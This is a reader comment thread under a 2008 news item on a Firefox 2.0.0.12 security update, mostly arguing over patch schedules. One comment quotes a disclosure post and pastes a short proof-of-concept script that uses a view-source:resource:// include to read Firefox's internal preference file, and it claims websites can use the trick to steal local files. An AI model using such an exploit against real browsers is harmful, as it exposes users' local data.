back to article Firefox updates, blitzes trio of critical bugs

Mozilla pushed out a new update of Firefox on Thursday that fixes ten security vulnerabilities, three of which are deemed critical. The trio of critical patches for Firefox 2.0.0.12 variously fix vulnerabilities including web browsing history and forward navigation stealing bugs; a privilege escalation flaw that creates a …

COMMENTS

This topic is closed for new posts.
Paris Hilton

'on a special Valentine's Day edition of Patch Tuesday'

scared me a bit there, booked McDonalds for Thursday..

0
0
Thumb Up

Nice of mozila.org to publish fixes WHEN IT'S READY,

instead of "holding it back" and leaving users vulnerable for additional days or weeks (as Microsoft does). As Microsoft does. I guess it saves them lots of money to update their "Windows Update" process only once a month, instead of doing it as needed.

My roughly-equivalent Linux feature, "Mandriva Online", checks for and finds updates every few hours-- for EVERYTHING, including application programs. Much Faster and Nicer to use, too-- a regular User can run it with their limited permissions password, being restricted only to the Update Sources which I have defined as being appropriate for automatic updates.

- - - - -

This all leads to the question, is Microsoft Windows really ready for the desktop? Their whole software maintenance design and implementation is a God-danged mess, and doesn't even handle any applications at all.

0
0
suc
Alert

Firefox 2.0.0.12 is still vulnerable to directory trasversal flaw!

Firefox 2.0.0.12 is still vulnerable to directory trasversal:

"don't patch vulnerabilities

for fifty percent, take the time and fix the cause. Because directory

traversal through plugins is all nice and such, we don't need it. We

can trick Firefox itself in traversing directories back. I found

another information leak that is very serious because we are able to

read out all preferences set in Firefox, or just open or include about

every file stored in the Mozilla program files directory, and this

without any mandatory settings or plugins."

http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060156.html

/*

@name: Firefox <= 2.0.0.12 information leak pOc

@date: Feb. 07 2008

@author: Ronald van den Heetkamp

@url: http://www.0x000000.com

*/

pref = function(a,b) {

document.write( a + ' -> ' + b + '<br />');

};

</script>

<script src="view-source:resource:///greprefs/all.js">

</script>

0
0
Stop

@suc

The flaw you mentioned only seems to work when the script is accessed from the local file system - if it's on a server nothing happens, so it's not really much of a problem.

0
0
suc

it works from remote

a web site is able to steal your local files.

0
0
Flame

Lulz

I'll downgrade my browser to Failfox - The day you pack ice skates for your journey to the seventh circle of hell.

0
0

@Rick Stockton

'"Windows Update" process only once a month' - well to be fair, it's once a week - hence Patch Tueday. And occasionally they do release very important patches outside of this scheme.

People seem to get ridiculously protective over this - it's only a browser. ALL of them have security holes and incompatibilities. The only reason why Firefox was any more secure when it first started was becuase no-one was using it. Why would hackers bother? As it's gained popularity (Just like OS-X) more and more hackers have found ways of exploiting it.

People are very quick to slate Microsoft over these kind of issues, despite the fact that Windows has to cope with an incredible range of software and hardware configurations, and a massivley higher level of hackers turning their attentions to it. Don't get me wrong - I think Windows and Microsoft generaly are pretty pony, but Windows and IE still own a huge majority of the market (80%-90% for windows, 65% ish for IE) and that makes it a lot harder for them.

I'm sure most of us can agree, if nothing else, if you keep your copy of any browser up to date, and don't visit any really dodgy sites (and have some AV etc.) you'll be fine.

0
0
This topic is closed for new posts.

Forums